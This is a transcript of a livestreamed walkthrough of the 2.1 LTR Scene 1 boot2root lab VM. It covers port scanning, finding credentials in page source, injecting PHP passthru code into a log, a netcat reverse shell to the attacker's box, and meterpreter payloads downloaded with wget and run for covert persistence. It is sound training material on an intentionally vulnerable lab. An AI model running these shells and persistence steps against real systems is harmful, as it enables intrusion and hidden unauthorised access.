Hello, hello, excellent. I think we're here. It's been a while, had some audio difficulties, but welcome back to my stream. I'm happy to be back. I'm looking forward to today, and I'm looking forward to more consistent streams, doing a boot2root every week, getting ready for Tournament of Champions in December. So, without further ado, let's just jump into it, yeah? So, the first boot2root I'm doing is this 2.1 LTR scene 1. And it's basically the oldest non-damn vulnerable Linux image on VulnHub. So I'm going to start early, back in 2012, and I'm going to start working my way forward. I'm going to skip, damn vulnerable Linuxes and damn vulnerable web apps and Matildas and stuff like that. They're all over the place, at least early, because they don't really have scenarios. They're just like hack all the things, which are fun for learning. But for these live streams, I kind of want to do, either story-driven stuff or at least objective-driven stuff, so that we have a definitive end, so we know when to close the live stream. So I went ahead and pre-downloaded this, and we have it here. This is being an old vulnerable image, excuse me. It came in ISO. This is before people were doing OVAs and various VM images. So we have to do something a little funky with this. We're going to have to create a VM, like a blank VM, and then just boot from the ISO for it. So let's go ahead and do that. Actually, let's take a look at the VM itself. If I recall correctly, I didn't do any like pre-work on this. Like I said, I'm going to do this all real time. We'll see how long it takes. But I did read, the description and whatnot. So it says here that it goes on to the 192.168.2.0 network. And it is statically addressed to 120. So when we create our boot or image, we'll maybe create a VM network for it, and then we can place our Kali box on that same network, so we can kind of interact with it. So how do we do this in Workstation? New virtual machine. Next. Install it later. Oh, we can just tell it which ISO to use now. It'll boot it. I mean, it says install, but it'll just boot it for us. Yep. It's Linux. I don't know what it's based off of, but being so old, I bet it's a 2.6 kernel. May or may not be 64-bit. Let's just say no for now. Does it say? It doesn't say. Cool. Fine. Whatever. Does the source? The site's not even up anywhere. That's awesome. When I downloaded it, I had to download it from the mirror. So if you're trying to follow along and you're last minute downloading it, check the mirror. That's where you're going to be able to get it. So we'll go ahead. I'm going to change this because I don't want it going there. I keep my VMs on my games drive because it's an SSD. So it's got a little extra room. Make a new one, and it's what, 2.1 LTR. So, let's change the name to 2.1 LTR. 8 gigs, we'll just store it as a single file. It really doesn't even need to be that because let's call it 2. No. 2, thank you. Because, yeah, it really doesn't. Let's give it 4096 because I got a shit ton of RAM in this computer. And we'll give it 4 cores because I have, or we won't need, it doesn't need 4 cores, but I'll give it 2. Close. Finish. And let's check out the network. The network. What? The network. So LAN segments. Nope. Advanced. Virtual network editor. We will give myself admin. We're going to do a new network. We'll call it VMnet 19, just it's the last one. We're going to make it host only. The subnet is going to be .2, right? Yeah, .2. Class C is fine. It doesn't need an Ethernet connector because it's host only. Brutal, or awesome. So we will provide DHCP because our Kali will want it, though I guess we could statically assign that too. Okay, apply, sweet. We're gonna change this guy over to a custom one, VM19. Okay. So then our Kali box is already running, but we need to change its networking as well. So let's settings. Yes. Put you on VM host 19. We might need to reset its connection here, unless it already did it for us. Oh, look at that. So handy. Cool. So let's turn this on. While that's booting, let's cd into boot2root, and we're gonna make dir the 2.1 LTR for our notes and whatnot. One of the things I'm going to be doing in this series is I'm going to be forcing myself to take more notes. I do take some notes on the stream, but really I should be taking notes on everything. We're not going to have to write a full report or anything, but we should have good notes, and that's just a really good hack practice to be in, and it's a practice I need to get better at. So let's see if this is booted. It is booted. Received a copy of the live CD. Let's discard and download a new copy from a legitimate source. Cool. Yeah. Okay. IP address is 2.120. Neat. So we can come over to Kali and full screen this. We probably don't need a full screen terminal. So first things first, well, other than let's get keep note going. Do a new notebook, root, boot2root, LTR, 2.1 LTR notes. Sweet. We will. I'm just going to go ahead and make a new folder right now because the first thing we're going to do is nmap, right? So I'm going to make a folder to contain all of our nmap scans and do the typical nmap p-p, which is a shortcut for all 65535 ports. That way, if it's got any weird ports, kind of tricks, gotchas, or something that aren't some of the standard ports, we'll see them anyways. We're going to do the default scripts on them with the -a, and this is 192.168.120. Did I already forget? The worst. Yeah, 120. Cool. And then we're going to output all formats to 2.1 LTR as the prefix. Then it'll be .nmap, .gmap, .xmap, or something like that. So this is going to go ahead and go. Kind of stuck waiting for a minute. I'm going to take a guess, just to have multiple things going at once. I'm going to take a guess and say that it has a. Oh, wait, what? Oh, what is this? That's not a real IP address. I'm going to take a guess and say that it has a web server, as most boot2roots do. And we'll say 2.1 LTR.nicto.text, because for some reason Nicto doesn't want to do like non-standard. It thinks it knows about extensions, even though it's a Linux command line tool, and there is a web server here. So we get this output, and then it's also writing it out to this file, so we'll be able to copy this file into our notes as well. So let's just make another folder here. We don't really need a whole folder. It's only got one output, yeah. Maybe if we do like further Nikto scans, like more advanced scans or different types, then we can have that. So let's just make a folder for it. It doesn't look like anything super crazy. It's definitely running PHP. It's got the trace method active, which doesn't really do much, unless it's referring to this. So Apache's old. Maybe we can do some exploits from that. For that. PHP's way out of date. That's good. Cross-site scripting doesn't help us much, given that it's just us. But good information. So let's go ahead. Let's open this up. We're going to go ahead and copy the Nikto.txt into our Nikto in there. We've got our output. One thing I like to do, it looks like it's already set up that way, but if you're just using KeepNote for the first time, or you haven't, explored it very well, one thing I really like is if we go in here, go into the notebook, and we set our default font to monospace. It is more similar. I think mine was already set to that because I think I have it set as a default somewhere. Maybe I set it to a default. But if you do set it up like that, when you copy command line output or in any kind of terminal, whatever, it more closely represents it and it looks better. It's easier for me to reference. Like copying like this in here, it actually looks like what I put in there as opposed to like a non-monospace font, and then it's all janky and weird. So is there anything else? I mean, we know there's a web server there, right? So let's go ahead and while Nmap is plugging away, let's go ahead and boot up Burp and Firefox. It looks like I was doing a CTF before last time. I think that was the Shaw CTF that was happening recently. I'm starting to get crazy windows here. All right. We're going to go ahead and add this boot2root to our, oh, it's already added there. Sweet. So Foxy proxy is configured. HP 12168. Oh, almost. And we're going to set our proxy to not intercept. Intranet development server. If we've arrived here accidentally, then close the page. If we need to contact the dev team, there's an email address. So let's go ahead and just start making a note of contacts for later. Maybe we need to impersonate users or something. So new folder, user, let's call it user info, email addresses. So Shift N will create a new, or I'm sorry, Control N will create a new page on the same level that you're currently on. Control Shift N will make a new child entry, just a page thing. So yeah. So anyways, we got email addresses, and we'll just go ahead and paste this one in here. Let's figure out why it's doing that. That's not very useful. Editor. Why? There we go. Okay, that's better. And then why is it not monospace? It really doesn't need to be Oh, because I copied it from here. It's like rich text. I don't want it to be rich text. It's super weird. Okay, well, fine. Moving right along. Nmap still plugging away. While you're doing an Nmap scan, you can hit enter or space or something, and it'll give you a status update. It's saying 30 minutes. Bull. It's all those ports and scripts. Well, we can keep plugging away, at least to do a little bit of evaluation. Maybe we'll cancel this and not do the scripts. All right, here's what we'll do. We will, so we're going to remove the star.nmap and remove 21.xml. Then we're going to do an nmap. We'll do not the full range, just a, how do we want to do this? Let's just do a port scan of all ports on 192.168.2.120 output 21 LTR dot port scan. And then we can go back through and run an nmap scan with the default scripts or more specific scripts if we want on specific ports that are open. That way we're not, wasting time. Anyways, back to this. We have burp. We have our history here. And here's our request, right? It's the same request. There's the get request. Here's the response. We've got the code here. We could also do a control U and see the code here. Wait, was that a comment? Username logs, password gobbledygook. So let's go ahead and let's grab this whole page here. I don't know what formats it better. This looks nicer. I mean, I guess that's just wrapped. Whatever. We'll go ahead and take this whole request, and we'll make a new. Oops. We'll make a new folder for, we'll just call it artifacts. And this will be index.php. And we'll paste that in there. And then in here, we'll make a new credentials file. When I take notes, I duplicate data a lot. I'll put, like I just did, I'll put the entire web page in one place and then put just the credentials that I found in another place. Yeah, it's duplicated data. I wouldn't go too crazy with it, but it's very useful if you're searching around later. You're like, wow, I found a new service. What can I do with it? And you just go to the credentials page rather than having to like search around through all your artifacts and be like, okay, where did I find credentials, etc. So that's why I'm doing that here. The rest of this page doesn't seem interesting at all, right? It's very nondescript. It looks like it's trying to force Comic Sans on you. Thankfully, I don't have Comic Sans. So yeah, it's just got the code.jpg, and it's not in a different directory, so we can't really do anything like that. So where can we use these credentials that we found? We don't see a login page here. Nmap's still plugging away trying to find us hosts or ports to services to get into. So what about let's do a derby while we're waiting. Let's see if we can find any pages that we're not aware of. And so with derby, we want to do an output file, output to disk, and we'll just call this 21ltr.derby. I'm not sure if it gets finicky about extensions or not. We'll find out. And then it wants the base URL first. So we'll go HTTP 192.168.2.120. And then we'll do output 21ltr.derby. And it's fine with .derby, which is good. That's nice. How's our nmap scan going? 15 minutes. What is the deal here? This thing is not responding to requests very quickly. So let's see, we've got a CGI bin, which we're not allowed to go to, index, and then we've got a slash logs. I didn't find anything in slash logs. Okay, so let's drag that derby scan. Here, let's do this. Let's do a scans. And then we'll just take the nmap and the nicto in there. That way we can collapse all this stuff if we need to once our tree starts getting really big. But this is one thing that I love about KeepNote is that you get this kind of hierarchical note-taking capability. So you can group stuff, close branches that you don't want, etc. So we're going to do another one here, and this will be for call it Derby. Maybe Dirbuster will take part later or something, but for now it's just some brute force page detection stuff. So we found that. Let's go back to here and let's see if we can get into logs. Logs or log? Oh, if it's not a .text, this thing doesn't want to. It doesn't want to display it. Maybe I should be. Why do these things care about extensions? Either way, so it is logs. That happened real fast, so I'm just going to rerun this with a dot. Or can I just rename it here? Yeah, okay. So I guess I'll just want to rename everything .text afterwards, which kind of sucks. But anyways, so .logs or /logs, and we're getting forbidden. Maybe this has to do with our credentials we found. Maybe once we get some more access. What is happening? Why? Why? Okay, we'll start here with we're gonna rm dot or star dot port scan dot star, and this won't get rid of our common port scan because it's not. Yeah. Okay, so we have our common ports, and it looks like in addition to HTTP, we also have SSH and FTP. So let's use our credentials that we found. First things first. Whatever. I want to make it so that these are easily readable inside KeepNote, but at the same time, it really doesn't bother me too much. I'm probably just going to end up being like catting these anyways. So now that that's done, let's do. I still really want a full port scan, so we'll just let that crank away in the background while we mess with these other services. 2.120 OA tr dot full port scan. Okay, so if we can cat these to 1ltr.common. And then so the nmap is just what nmap output, right? And there's a gnmap as well, which gives you this greppable format. So you can just grep for like open, and it'll show you the host and what ports it has open. But it won't, like if we scanned multiple hosts, it wouldn't show us, things that, hosts that were up, but, didn't have open ports or whatever. So anyways, it's a neat thing for those reasons. But we have an FTP and SSH. So let's try SSHing as logs. 20 L logs. Yes. And let's find our credentials. Oops. Nope. Okay. What about FTP? Man, this system is slow. Is it just getting wrecked by the nmap scan, or what's the deal here? Can I look at... I wonder if... Does Workstation have, like, metrics or anything? Yeah, I don't see any, like, performance metrics. It is. I mean, I guess it is a live CD. Ugh, that's frustrating. Okay. Why? Ah, okay. So, how do we want to take these notes? We can do like running, or we'll just call them services. Under services, we have the FTP, we have SSH, and we've got HTTP. Okay. And then another cool thing about KeepNote is that you don't have to have even these directory structures. Under this FTP, we've got some notes, right? And we can just make a page directly under FTP that also belongs to it, where we can, paste other files or whatever we want. But so that's pretty sweet. Let's do an ls. Take an hour and a half to get back to us. This nmap thing is really going to hamper shit. Backup log.php. So we'll go ahead and take this. Can we do it? Okay. This is just their listing. And then let's get backup log.php. Ugh, how big is this thing? It's so small, and it took so long. Or it just took long to kick it off, I guess. This sucks. Okay. So there's no... I mean, we're in the quote-unquote root, the home directory for the FTP user. I shouldn't have done that. Why does this take so long? Why did I do it again? Muscle memory habits are bad, kids. Okay. We are going to... we can't... There's no directories to cd into. Can we cd ... We're in the same directory. Whoa. Yeah, so there's nothing else to be gained here, at least for now. So we'll go ahead and exit. We have this this backup log .php, so we'll go ahead and put that in our artifacts as well. And I don't know that we need to make another note here that we found. Ah, that wasn't good. Another great thing about KeepNote is that basically the way it works, is that it stores. If we go into this notebook, so this file is literally just a directory and has all files underneath it. So there's no need to, I mean, you can save the notebook and whatnot just to be super paranoid, which I usually am, but there's no need to really save it per se. This is here. The backup log.php is already there. So, that's nice for when it crashes like that. So let's take a look at what that backup log.php is. So log equals time. Time is blah. And then this, it's got no space left on disk. January permission was denied from 2.240. That's interesting. That's not us, is it? I mean, it couldn't be for the time there. Okay, let's see if does this exist on the server. Backup log. No. Is it in logs? Ha! Okay, this is good. So let's make a note of that somewhere. So as part of the Derby, oops. So found 192.168.2.120/logs/backup log.php. So that wasn't found by Derby because here because they didn't have backup log.php in the word list that it was using. We can fix that. We can change if we go into Derby, we can set a word list file if we want. And then if we do, let's do echo backup log backup underscore log.php into word list. And then we do Derby. This is, this is silly, but let's do it anyways. 2.120. And then we will do I haven't done a word list with this, so I'm not sure if it works exactly like this, but and see, then it found it, right? If we did, what's its default word list? What is the default word list that it uses? I don't know what it uses by default, but here, so you can tell it not to search recursively or interact with recursion. When you do, and just do this, it goes through, and it finds a log. See how it found logs, and it said enter directory, and then it went through a bunch of stuff again. That's because it will recursively go through directories it finds. It will, if it finds directory listing, it won't necessarily, but it will if it doesn't find directory listing. So if we would have added backup underscore log.php to this word dictionary, it would have entered this and then found it for us. Either way, we now have this guy, and artifacts. So we have log equals time, and then we echo log. So we have some variables here that we can maybe do something with. Or what is it? Log. What does GM date do? Oh, and of course I don't have a, yeah, I don't have an internet connection right now because I'm on that private network. So let's find out what GM date does. String format. Oop. Timestamp. Time. So oftentimes what I'm doing right now, oftentimes if there's a like a well-known vulnerability in a PHP function, I've often ran into someone in the notes on the PHP website saying, "Don't use this; it's broken." Blah blah blah. But that does not appear to be the case. So it sets it to the time function, and then it calls it here in the GM date. What if I could can I set it to something else? Oh, what am I doing? Can I like do this? It appears not. Oh, of course it's not going to do that because this isn't getting it from, or this isn't pulling it from the get uh, request or anything like that. So it doesn't appear that it's interacting with me in any way. What is Burp saying? No space left on the device. That's not good either. Oh, that's saying that 240, there's no space left on the device. It's not running multiple IP addresses, is it? With how long these freaking Nmap scans are taking, that's going to drive me crazy. So the description on the VulnHub page says that all tests will be restricted to the systems identified on the 192.2.0.24 network. So it's possible that it does have multiple interfaces, maybe, or at least, yeah, yeah, maybe it doesn't have multiple physical interfaces, but it could have multiple logical interfaces, I guess. Let's test the theory. 168 2.240 OA 21 LTR 240 dot scan ports. It's down. Why do you hate me so much? There's got to be something with this. I'm wondering if masscan can do this faster. I don't know why that would be the case. But we can't sit around waiting 50 minutes to get this. I feel like I'm at a dead end right now. Couldn't determine default interface? There's only two. Like, what is that? Does it do the failed to detect router for interface? What is the damn problem here? Checking my ARP table, I'm just going to tell it the router is the MAC address for 2.120. I love how everyone, like every tool and every vendor seems to have their own way that they want to display the freaking MAC address. Dude, that's already much faster. Look at how fast that's going. 20 minutes. That's way better than 50. It still sucks. It hasn't found any ports yet. Hello, Anismus? Anismus? I'm gonna be super glad when we move on from this and get into more modern boot2roots that you know, have VM images and aren't slower than dirt. I really wish I had some form of what are the performance metrics? It's got to be a thing, right? Hmm. And this is clearly going much faster than nmap, so I'm just going to kill the nmap scan. Maybe speed this up. I guess I could have increased the rate. It's just dash rate, right? Did I not put it here? Oh yeah, that's way better. I didn't find anything though. That doesn't seem right. Oh, okay. Just found those 3? Well, shit. What is my main OS? Any OS? The one that the hypervisor is running on is Windows right now. But I've got a Mac laptop and, Linux laptops and all that stuff. Really just whatever will run a hypervisor so I can run, 5 or 6 different things. This is weird. I really don't think this is useful yet. I mean, there's nothing here. See, and this hasn't even found 22 yet. I think this machine is just getting wrecked. Okay, let's try a higher weight. And let's... Okay. So we're going to do this. But we're going to do weight. Let's do 30 seconds. Just to give it plenty of time to... See, look at that. It just... Okay. Yeah, this host is just wrecked. So now we've got a new port, which is good. Do we have anything else? Let's give it the full time. It's actually the first time I've used Masscan. It's a pretty neat tool. Oh, damn it. There we go. Okay, and we'll just do... So we've got this 1001. Let's get all these terminals out of the way. We don't need them all. So let's see what happens when we connect to that. Or 10,001. What was it again? Yeah, 10,001. Hmm. Oh. Ha. Gets mad when you do illegal things. Try to use Sparta. I haven't ever used Sparta. What is Sparta? Hmm. I don't know what Sparta is. Sparta? What am I looking at here? Nope, that's not going to do anything. Network infrastructure penetration testing tool. Hmm. Well, I'll take a look at this sometime. It looks neat. But I'll reserve that for later. What was I doing? See, it says closed. Nope, can't connect. Now it won't let me connect at all. What is happening? Is there a port knocking? Is there some sort of port knocking thing for this? Or is it... Is it like open only certain times? Huh. It's right here. What is the deal with this thing? Also, what's happening here? Why is it waiting negative seconds? Don't wait negative seconds. Stop it. And now it's not seeing it? This is super confusing. I feel like it's either got to be some sort of port knocking, or it's a service that flaps, or maybe I just freaking knocked it over. I wonder if I reboot it, if it pops back up. Let's just try that before I get too stuck on this, like going down a rabbit hole of like, oh, maybe it's only on for minutes at a time. Huh. What? What? What is it doing? All right. Let's see. So it's back up. Doesn't appear to be a knockover problem. So maybe it is a port knocking thing, or maybe it is a timed thing. Hmm. Hmm. Okay, so let's think about this then. If that's a rabbit hole that I don't even know how to deal with. Um, we've got three things. We got the FTP port, which we found, and it had this backup on it, or this page in it. Um, we tried SSH, but the one credential that we found doesn't work on it. So um, so this can be interpreted help. Wait, what? Why does it say help? Is that in the code? No. Wait a second. I typed in help when I connected earlier. Remember, do I still have that? Or was that one of the other windows? As the FTP, a dir bead, a bunch, and mapped a port, did mass scan, ARP A. Oh yeah, right here. I typed in help. So this has something to do with the 10,001 port. Yeah. There's some sort of communication happening here. Let's see if maybe it's reaching out as well as receiving. Ugh, shut up, Firefox. Why are you so spammy? It's trying to reach out to its portal. Wait, what the? Oh. Wait, is my host? Huh. Maybe we should do ip.adder equals 192.168.2.120. Oh, whoops. It's all its um oh no. It's like, stop it, I don't want to be touched by you. Should not have done that. Let's restart this. Hold on a second. If Minuten bitte. Let's see. 2020 logs backup. Oh, geez. Yeah, all the TCPs, right? And now it doesn't have help anymore. That's weird. So if I was able to get something on here, it just showed up. It was like help. Can I get PHP in there? Okay, what are we going to have to do? We're going to have to continuously try and connect to that port. What was it? 10,001. And as soon as we do connect, we need to input PHP code into it. And print out something saying, yo, I did it. So a couple things first. Let's get the syntax for pass through. I think it's just like something like it's like pass through, and then it's like get or $, get or something like that. Command, and then return value is not needed. Can I just that's the syntax. Okay. So if we just that's the syntax we need. What are we going to do? Just write Python, I guess? So we're going to need to do Python sockets, right? Let's open up Atom here. Just taking notes again, just to make sure that I don't really lose anything or lose my train of thought or whatever. So I like Atom. You can use whatever you want. We're gonna save this to boot2root 2.1, and we're gonna call this. Let's call it 01 gel to pi. Fine. So we use Python 3 in this house, damn it. But seriously, Python 3 has been out for like 8 years now. Let's just use that, huh? So we're going to import sockets. Socket. 3.5. Okay, cool. So sockets. Python open socket or connect with socket. In fact, let's just do some prototyping. Python. Right. Let's see. Okay, so this is how we initiate the socket. Call this, yeah, fuck it. We'll just call it sock because reasons. So when we equals, and that's 192.168.2.120. It's on port 10,001, right? Does that need to be a string? No, cool. So then if we do sock dot, oh, I don't want to bind. Sock dot connect. Connection refused. So we need to handle that. Oops. Sock dot or target equals 192.168.2.120. Now, as frequent watchers will know, I am not a developer. I use Python occasionally when I need to, like so. The more I use it, the better I get, and then I don't use it for a while and I lose it. But this is all fairly important that you see this process because this just goes to show you a little bit of Python knowledge, just like a little bit of understanding of kind of how programs in general work, and ample Googling, you can put together pretty useful tools just like off the bat. So I know that in Python we import a library and then we can use that library to do things. And then I just find a tutorial online that uses that library to do the thing that's close to what I want. Additionally, the actual documentation, the Python documentation itself is very helpful. You can look through and say, okay, I really need to connect. I can create a connection. I can accept connections. Also, just in the periphery is like, oh, I can bind to an address. That's going to be useful, maybe. Socket.connect, that looks more like what I'm looking for, right? So it's don't be afraid to get your hands dirty, especially with Python, because you can open up an interpreter and just kind of go line by line. You're like, okay, I think this is going to do what I want to do. Try it. Well, the connection was refused. That means that it tried to get the connection, right? What happens if we go target equals, let's call it target target web, and we'll just do this just as a kind of, just to make sure that this connection refused is because the port's not open right now, not because we messed this up, right? So what happens if we do sock connect target web? Aha! It came back as nothing. Why did it come back as nothing? What if we do webcon equals, oop, it's already connected. So it's currently connected. It's not doing anything. We're not receiving any data. We're not pushing any data, but it's connected. So that's good. We know that that's working. Let's get out of that. We'll re-import sockets. We will we will get our socks initiated again. We will set up our target, and we will do our sock connect just to see. It's refused. Cool. Okay, so we're here. We're on our way. to doing something useful. I'm going to do the sock connect target. This sock connect target will eventually go into a loop so that it'll basically continuously try and connect if it keeps getting refused, right? So we need to figure out a way to accept or handle this exception, this connection refused error. So how do we handle that exception? So let's see. It's the okay, how do we catch this? So error number 111, is that what it's referring to? Okay, so we're just going to do, now this is where we get hacky, so developers, please please avert your eyes. So we're going to do while true. We're going to do a try except, right? So what this is doing is, if we look at this person's code, what this does is that it's going to try and do this. If it fails, you have the option of accepting an error, like saying, okay, I got an error that I was expecting to get. Here's how I'm going to handle it. I'm going to do something else. I'm going to print connection refused or whatever. And then he's got a little thing here where if it's not the error that we were expecting, then they raise the error again, which will cause the program to error out unless you handle it in some other way. So we're going to try this. How do I do this? So I basically want this to keep trying as long as it keeps getting this error number 11, this connection refused error. And if it doesn't get that, Oh shit. Let's do it quick and dirty. Dot 2.120. No! It's currently connected. How do I send data through the socket? Send. Send message. Send data over socket. I don't want to receive. I want to send. That's what I was saying. Send data, Python, send data over socket. Come on. Send all. Do I want it to be binary? I don't know. We will find out. And if I remember correctly, is this right? Oh, Oh, what? Well, now we know it worked, right? Ah! Haha! It worked! Excellent! We didn't get to get our Python thing set up, but we just happened into, getting this to work. So what we would end up doing is, we would end up doing this. So we would try... We would keep doing this, and like, once this is actually successful, once this is actually successful, so I'm not sure how try except works. Maybe we could do something like this. We would do sock connect, and then we would do this, and then we'd do like break, and then we'd have the accept, right? And the accept would be this statement here. This one, accept socket error as sir. If it's not, then we don't even really need this. We don't even need this really. We just pass it and be like, okay, it errored. We knew it was going to error. Pass. And just restart the loop over again. I'm not sure if this would work. I'm not sure if there. I'm not sure if it evaluates one line at a time, and if it accepts here, then it just doesn't do the rest of this. Again, I'm not sure how pass through or how try except works specifically in that regard. But something like this would have eventually achieved what we did here. And right now we've got command execution, right? So we're running as Apache, UID 80. Excellent. Let's try and do some shenanigans. Finally. So we're going to NC NLP 443. Sure, fine. And then we're going to try and tell this to NC E bin bash 192.168.2.128 443. So now we've got a shell running, yeah? Let's do some privilege escalation. Or not some privilege escalation, but let's get some persistence. We're going to do hacky persistence because I just want it to work right now. Well, let's see. Let's do something sneaky. So if we go to, so let's find out where we are. Let's do this. PHP interpreter reverse TCP lhost equals 192.168.2.128. lport equals 44444. Fine. I'm gonna do this till it's legit.php. Okay. Then we are going to do Python 3 m php.server on port 80. And here we're going to wget php 192.168.120, or I'm sorry, 2.128 slash totes legit.php. Permission denied. Cannot write permission denied. Oh, interesting. It's all owned by root. Why is it all owned by root? What? What is happening? This is crazy. Okay, so I can't write as Apache, so well, I can probably write to temp. This isn't going to be as neat because I'm not just going to be able to put what I wanted to do. The intention was that we would put that in the web directory, and then if we ever lost our shell, we could just curl that one address again, and it would get us a new PHP shell. But we're gonna do something a little bit different. Let's see, we'll do Linux. Okay, it is a 32-bit. Yeah. Okay, so so they do say x86 specifically. Interpreter. Oop. Host 192.168.2.128. lport equals 4444. Fine. And format will be elf. And we will do that into not suspicious. So what I'm doing is I'm just creating another shell that in case we ever lose this this access, we're gonna have this shell that will run from temp. Hopefully I can run to temp or write to temp. We'll see. We're gonna chmod +x not suspicious, and then we're gonna do the Python hp.server on 80. And we're in temp, yep. So wget not suspicious, or sorry, 2.128, not suspicious. Cool. There's a backup.tar.gz. We will be getting that we will absolutely be getting that. So we're going to use exploit multi-handler. We're going to set payload to the Linux x86 interpreter reverse TCP. Set all 168 to 128. There's a, is it like no quit on? Exit on session, false. And then if we, let's get this to be a normal shell, a normal TTY. So we're going to do Python C import TTY, tty.spawn, then bash. PTTY? Is that the name of it? I think that's how it works. Maybe I'm wrong. Import tty, tty.spawn. pty. Okay. Python C import pty.spawn. Excuse me. See what happens when you're not in practice? It's important to practice every week. Every week. Get ready for that tournament of champions. All right, now we're in a bash. We're in a proper bash shell, proper TTY. I can do like sudo and su and all that kind of fun stuff. So let's do a how do we do no hub again? Yeah, that's exactly what we want. So no hub / not suspicious, and put it in the background. Permission denied. Okay, let's do that again. There we go. We got our session. And sense info, cool. Get UID. We're still 80. Okay, but now we have a couple different shells. If one's found and killed, blah, fine. It's obviously not the most stealthy thing because it's Meterpreter and it's going over 4444 and all that stuff. But we've achieved some sort of persistence. Let's get our shells in here. So let's do this. We're going to save that. I'm going to put this script both in here just for notes, and then I'm also going to put it in the artifacts because I want that. And then, if we basically, if we just put that in there. Now, the other thing that we should be doing probably is screenshotting stuff. In the pwk/oscp, the first thing, the only screenshots you really need are achieving the shell. So we do, I guess I closed the terminal, huh? Yeah, I did. Wait, did I? There's a bunch of these things here. That's Metasploit. So we can do something like, where's screenshot? Or they put it up here now, didn't they? No. Okay. When I did the OSCP, I took the screenshot app and I just added it to favorites here, so it was just always present because it's damn useful. So select area to grab, and we'll just say, look, here's us getting the shell. Home, boot2root, boom, and we'll make a screenshots folder or something. Open that, and then we'll say non-priv shell. And of course, we'll also put that in here. Oops. Just put that in there. We'll rename this. Actually, let's delete this. We'll rename this to exploit. And then it's really lame that this isn't a browser, but whatever. Area to grab. Actually, let's not do that. Let's do so that we can see that we ran this command and then we got you're wrong. We ran this command and got our shell, right? So that's what we're trying to illustrate here. Non-priv shell achieved. Okay, there's our shells. Cool. We can move on, do some fun stuff. So again, if we recall, in Temp, we're still in Temp, yeah? In Temp, we have this backup.tar.gz. That looks amazing. So we're in the right place. So let's, so Control Z will background, or I think you can just type background if you want. We'll background a session in Interpreter or in Metasploit, so you can just bring it forward again by interacting with the session again. When you run the download command, it downloads, unless you give it a specific place, which I don't feel like, it'll download to whatever local directory you're in. So that's all I was doing. We're going to download temp backup.tar.gz. Boom. We now have it. So oop. So we should keep a copy of this artifact stuff and then we can tar xvzf backup. Or no, wait, yes? Oh, I'm not in artifacts. Tar xvzf backup. There we go. Media backup. Pixie Linux config tar.gz. Interesting. Why is that executable? Nah. This file is packed with the UPX extractable packer, executable packer. Okay. It's like a monkey web server. A little very strange. I'm going to keep that for now. I feel like I'm kind of going down a rabbit hole. This might just be a backup that wasn't cleaned up from when they were creating the boot2root. Who knows? But you know, we have it. We can dig further into that later if you know, we get stuck and feel the need. So let's find out. Let's find out what else we got. You got. All right. So let's see password. And under artifacts, we'll definitely want etc password. Oops, that's not under artifacts. Oh, this is like the perfect opportunity to test this thing that was recently on the interwebs, and it was like magic upgrading shells to TTY or something like that. It was yeah, is this it? Yeah, this is it. So generating reverse shells, blah blah blah, Python PTY module, which we did. Upgrading from Netcat with magic. So following the same technique, we do the thing and then we background it. So backgrounded. The information needed. Okay, so we do stty minus a, and the information needed is the term type and the size of the current window. So rows 38, 116. The term type is xterm. Oh, echo term. Okay, so we have basically the same term, just different size. Wait, why did we need the? Why did we need the term? Oh, I see. So with the still in the background, we do stty raw minus echo. Program the shell with fg. Ah, we have tab complete. Ah, this is so amazing. And then what did they say? We can export these to have like the full thing, right? Oh man, I didn't get the. I didn't get the size. Oh well, I don't think it's that important. I think that's just some other stuff. But having being able to do tab complete is amazing. So cool. Let's go to Etsy. Let's check out what's around. We got Shadow. Can't read it. What about this is a cat Etsy group. Keep that in artifacts because those are useful. Etsy group. Maybe he has some. This user has some screen stuff hanging out. Oh my god. Okay, so they're using screen, which could be used to know. Maybe they've got some saved screen instances or some running screen instances that we can grab somewhere. Let's do jgreen as well. I want to know that. So there's a jgreen. Whoever J is, has something in this directory path called payroll. Now, we can only read it if we're jgreen. For those who need a reminder, the way that permissions are labeled in Linux, you've got whether or not it's a directory and a couple other things. Then you've got the permissions, read, write, execute for the owner of the file. That's this person listed here. You've got read, write, execute for the group, which is this list here. And if we look at Etsy group, we can see who's in users. Looks like nobody's in users. So that's not really helpful at all. And then these are the permissions for everyone else, literally everyone else, Apache, whoever. And so what it's showing here is that we have the read bit set for the user, for the owner of the file, and no other bits are set for anyone else. So we can't currently read that, but we want to make a note of it because we want to come back to that. If this were an actual penetration test, the fact that we can find that file, and if we're able to get access to that file later, that's a good thing to document for your client. So we've got users. Who was the other user? It's this HBeal user. And then in the Etsy password, what else we got? So logs has bin bash available, which can be handy because if we have login credentials for logs, which could get us to be a better user than the one we are, Apache, right? So if we look, Apache doesn't have a real shell. It's in serve HTTPD. It's just not a general user. This logs is the temp, is their home directory, but they do have a real login and everything. So let's see if we can su to logs. And then if we look at our credentials again, hey, and we're an actual user. So that's cool. So we definitely know. Let's go ahead and duplicating a little bit of information here. But again, if I want to know everything there is to know about the logs user, I'm going to look here. I'm not going to look in the credentials thing. If I want to know any credentials I have available to me, I'm going to look in credentials, not each user, right? So that's kind of the method to my current madness. So let's see here. Oh my God, we've been going for 2 hours. See why this isn't as fun as me having done it previously? There's just a lot of downtime going on. What now? So there's our shell that we've got running over wherever. Over in our interpreter, we can actually close this guy down. They don't need to wget that anymore. We've got our interpreter shell over here, just kicking back and being cool. In case we lose this shell, we can use this to. We'll kind of pretend or treat this as like a command and control, like a stealthy command and control. So we can use it to spin up other shells if we need them. Actually, can we see it? Yeah, I mean, totally not suspicious guy here. That's us. So, but let's do that. Let's see what's running here. We got HTTPD, we got Pro FTPD. Maybe we've got it's being ran by nobody, so I'm not sure how useful that'd be, but maybe there's a vulnerability or exploit we can sling at that thing. Some other stuff that we got going on, cups, cron, HTTPD. Oh, you know what? There's that logs server that we used to even get in here in the first place. Seems to have some sort of repeating process that it goes through, right? So is it from logs? No, of course not. Let's see, cron. Oops. LSR cron.star. Cert watch and log rotate. Well, that's not going to be frequent enough for what we were doing. but I'm curious about this log rotate. Yeah, that's not it. Man, it is so nice to have like up and tab and all that. So we're gonna copy this into our artifacts as well. Just so that we have an understanding of what's listening and what it's listening on, etc. Interesting. What is this? Port 631. Printing. So it's got an internal. Who's running that again? Grep minus I is just case insensitive, so I don't have to guess whether it's uppercase or lowercase. So root is running cups, which is interesting. It's got a port open internally, but not externally. So that might be something that we can deal with. Oh, what are we? What does it not have this? Oh, it's slacks, right? Duh. It says it on the MOTD slacks, etc., etc. Man, I haven't dealt with slacks in ages. Is it RPM? Is Slacks RPM? Oh, gross. If I remember correctly, it's QA. Cups D. There's no weird groups, or group memberships, so I don't know how much that's going to help us. Logs is in group 100. Both HBL and J Green are in group 10 as their 